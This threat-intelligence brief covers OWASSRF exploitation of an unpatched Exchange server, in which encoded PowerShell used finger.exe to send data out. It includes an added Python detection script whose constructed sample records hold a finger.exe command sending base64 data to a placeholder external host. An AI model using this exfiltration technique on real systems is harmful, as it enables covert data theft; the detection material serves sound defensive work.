2024-02-22

OWASSRF Exploit Resurfaces with Stealth Data Leak Strategy

Level: Tactical  |  Source: Huntress & Dray Agha (2022-12)  |  Global


Exploitation of OWASSRF was detected in January 2024 by analysts in Huntress' Security Operations Center. The discovery followed the installation of the Huntress agent on a new endpoint, which immediately surfaced a legacy Windows Defender alert for a finger.exe command pointing at an IP address previously identified in Huntress' November 2023 incident report. The command was attempting to send encoded data, prompting an investigation that uncovered a series of base64-encoded PowerShell commands alongside one non-encoded command line, all designed to transmit data out of the host using the built-in Windows tool finger.exe. Although Windows Defender intervened, the timing of the commands indicated they had most likely executed successfully, raising concerns about the endpoint's security in the period before the Huntress agent was deployed.
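Detection logic for the finger.exe pattern described above, written as an added example and not taken from Huntress or the original post. It runs three checks over constructed Sysmon-style process-creation records: finger.exe reaching a host outside a locally defined set of internal ranges, a base64-looking user field (the part of the argument that finger sends to the remote host), and an encoded-PowerShell parent; the sample records, the placeholder address 203.0.113.10 and the internal-range list are assumptions.

```python
import base64
import ipaddress
import re

# Constructed Sysmon-style records, not real telemetry; 203.0.113.10 is a documentation-range placeholder.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\finger.exe",
     "CommandLine": "finger.exe dGVzdA==@203.0.113.10",
     "ParentCommandLine": "powershell.exe -NoProfile -EncodedCommand ZgBpAG4AZwBlAHIA"},
    {"Image": r"C:\Windows\System32\finger.exe",
     "CommandLine": "finger alice@10.0.0.5",
     "ParentCommandLine": "cmd.exe"},
]

# Ranges this (assumed) organisation treats as internal; replace with your own list.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
# finger syntax is [-l] [user]@host; the user part is what finger sends to the host.
FINGER_ARG = re.compile(r"(?i)finger(?:\.exe)?\s+(?:-l\s+)?(?P<user>[^@\s]*)@(?P<host>\S+)")
ENCODED_PS = re.compile(r"(?i)powershell(?:\.exe)?\b.*\s-(?:e|ec|en|enc|encodedcommand)\s+\S+")

def looks_base64(s: str) -> bool:
    """True if s is at least 4 chars of strictly valid base64 (the encoding Huntress saw)."""
    if len(s) < 4 or not re.fullmatch(r"[A-Za-z0-9+/=]+", s):
        return False
    try:
        base64.b64decode(s, validate=True)
        return True
    except ValueError:  # binascii.Error is a ValueError subclass
        return False

def is_external(host: str) -> bool:
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return True  # hostnames: assume external unless you allowlist them
    return not any(ip in net for net in INTERNAL_NETS)

def analyze(event: dict) -> list:
    # Returns the rules this process-creation record trips (empty list if none).
    reasons = []
    if not event["Image"].lower().endswith("finger.exe"):
        return reasons
    m = FINGER_ARG.search(event["CommandLine"])
    if m and is_external(m.group("host")):
        reasons.append("finger.exe contacting external host")
    if m and looks_base64(m.group("user")):
        reasons.append("base64-looking data in the user field")
    if ENCODED_PS.search(event.get("ParentCommandLine", "")):
        reasons.append("spawned by encoded PowerShell")
    return reasons
```

A legitimate finger query to an internal host with a plain username trips none of the rules, which keeps the alert volume low enough to review each hit by hand.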

Further analysis of Windows Event Log and server log data confirmed the link to OWASSRF, a vulnerability first analyzed by Huntress' SOC manager, Dray Agha, together with CrowdStrike and Unit 42 in December 2022. The absence of follow-on malicious activity, coupled with the discovery of an outdated Microsoft Exchange installation, demonstrates the critical need to prioritize software updates and to take a proactive stance through threat hunting and the use of cyber threat intelligence. Huntress security researcher Harlan Carvey summarized the outcome of the analysis: “As there was no follow-on activity identified, it would appear that the commands detected were associated with a scan. Upon verifying that the customer’s version of MSExchange had last been updated in September 2021, we immediately advised the customer on the urgent need for an update.” This statement confirms the SOC team's initial suspicions and serves as a stark reminder of the risks posed by neglected system updates.

The initial documentation of the OWASSRF vulnerability in December 2022 tied it to Play ransomware attacks. At the time, Agha's post on X described an instance in which the threat actors used the ScreenConnect remote access tool for command and control, alongside Mimikatz for credential access.
